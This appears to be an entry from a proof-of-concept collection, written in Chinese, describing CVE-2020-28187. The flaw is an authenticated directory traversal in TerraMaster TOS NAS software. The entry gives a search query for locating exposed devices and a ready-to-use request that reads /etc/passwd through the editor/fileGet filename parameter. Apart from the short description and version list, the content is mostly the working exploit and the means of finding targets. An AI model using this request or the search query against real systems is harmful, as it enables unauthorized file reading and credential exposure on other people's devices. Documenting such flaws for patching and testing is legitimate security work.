Awesome-POC/Web应用漏洞/TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187.md
2024-11-06 14:10:36 +08:00

31 lines
660 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187
## 漏洞描述
TerraMaster TOS <= 4.2.06中的多个目录遍历漏洞允许远程身份验证的攻击者通过/tos/index.php?editor/fileGet路径下的filename参数、 /include/ajax/logtable.php路径下的Event参数和/include/core/index.php路径下的opt参数读取文件系统中的任何文件。
## 漏洞影响
```
TerraMaster TOS < 4.2.06
```
## 网络测绘
```
"TerraMaster" && header="TOS"
```
## 漏洞复现
登陆后访问验证漏洞的POC为
```plain
/tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd
```
![](images/202202101948100.png)